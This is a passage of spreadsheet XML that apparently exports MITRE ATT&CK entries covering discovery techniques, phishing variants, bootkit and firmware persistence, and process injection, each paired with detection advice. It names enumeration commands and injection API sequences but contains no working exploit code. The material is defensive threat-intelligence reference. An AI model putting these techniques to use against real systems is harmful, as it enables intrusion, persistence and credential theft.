    <t>Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Cloud Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;code&gt;GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/003</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</si>
  <si>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Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Domain Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Local Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/001</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to gain access to victim systems.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malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Philip Winther</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) 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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598</t>
  </si>
  <si>
    <t>Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).</t>
  </si>
  <si>
    <t>Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee</t>
  </si>
  <si>
    <t>T1598.002</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Attachment</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious attachment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attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/002</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Link</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious link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the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/003</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Service</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/001</t>
  </si>
  <si>
    <t>Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.</t>
  </si>
  <si>
    <t>Robert Simmons, @MalwareUtkonos</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Attachment</t>
  </si>
  <si>
    <t xml:space="preserve">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Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Link</t>
  </si>
  <si>
    <t>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 Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/002</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Philip Winther; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>Phishing: Spearphishing via Service</t>
  </si>
  <si>
    <t>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 
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/003</t>
  </si>
  <si>
    <t>18 October 2020</t>
  </si>
  <si>
    <t>Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. 
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>13 November 2019</t>
  </si>
  <si>
    <t>Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)</t>
  </si>
  <si>
    <t>Linux, Network, Windows</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Modification, Driver: Driver Metadata, Firmware: Firmware Modification, Network Traffic: Network Connection Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>Pre-OS Boot: Bootkit</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>19 December 2019</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Drive: Drive Modification</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>Pre-OS Boot: Component Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>Driver: Driver Metadata, Firmware: Firmware Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>Pre-OS Boot: ROMMONkit</t>
  </si>
  <si>
    <t>Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>Pre-OS Boot: System Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>19 May 2020</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET; McAfee; Ryan Becwar</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>Pre-OS Boot: TFTP Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</t>
  </si>
  <si>
    <t>Command: Command Execution, Firmware: Firmware Modification, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or &lt;code&gt;Get-Process&lt;/code&gt; via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt;. In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command. Adversaries may also opt to enumerate processes via /proc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1057</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</si>
  <si>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that look like process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</si>
  <si>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T1055</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t xml:space="preserve">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 
There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055</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</si>
  <si>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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017) 
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Anastasios Pingios; Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Process Injection: Asynchronous Procedure Call</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point &lt;code&gt;QueueUserAPC&lt;/code&gt; can be used to invoke a function (such as &lt;code&gt;LoadLibrayA&lt;/code&gt; pointing to a malicious DLL). 
A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>14 January 2020</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</si>
  <si>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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Process Injection: Dynamic-link Library Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; (which calls the &lt;code&gt;LoadLibrary&lt;/code&gt; API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) 
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of &lt;code&gt;LoadLibrary&lt;/code&gt;).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/001</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</si>
  <si>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and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Process Injection: Extra Window Memory Injection</t>
  </si>
  <si>
